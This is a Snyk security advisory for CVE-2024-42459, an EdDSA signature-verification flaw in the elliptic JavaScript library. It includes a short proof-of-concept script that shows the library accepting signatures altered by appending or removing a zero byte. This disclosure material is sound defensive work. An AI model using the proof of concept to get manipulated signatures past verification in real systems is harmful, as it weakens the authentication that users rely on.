Improper Verification of Cryptographic Signature Affecting org.webjars.npm:elliptic package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-7707762
- published 19 Aug 2024
- disclosed 2 Aug 2024
- credit Markus Schiffermüller
Introduced: 2 Aug 2024
CVE-2024-42459 Open this link in a new tabHow to fix?
A fix was pushed into the master branch but not yet published.
Overview
org.webjars.npm:elliptic is a Fast elliptic-curve cryptography in a plain javascript implementation.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to a missing signature length check in the EDDSA signature process. An attacker can manipulate the signature by appending or removing zero-valued bytes.
PoC
var elliptic = require('elliptic'); // tested with version 6.5.6
var eddsa = elliptic.eddsa;
var ed25519 = new eddsa('ed25519');
var key = ed25519.keyFromPublic('7d4d0e7f6153a69b6242b522abbee685fda4420f8834b108c3bdae369ef549fa', 'hex');
// [tcId 37] appending 0 byte to signature
var msg = '54657374';
var sig = '7c38e026f29e14aabd059a0f2db8b0cd783040609a8be684db12f82a27774ab07a9155711ecfaf7f99f277bad0c6ae7e39d4eef676573336a5c51eb6f946b30d00';
console.log(key.verify(msg, sig));
// [tcId 38] removing 0 byte from signature
msg = '546573743137';
sig = '93de3ca252426c95f735cb9edd92e83321ac62372d5aa5b379786bae111ab6b17251330e8f9a7c30d6993137c596007d7b001409287535ac4804e662bc58a3';
console.log(key.verify(msg, sig));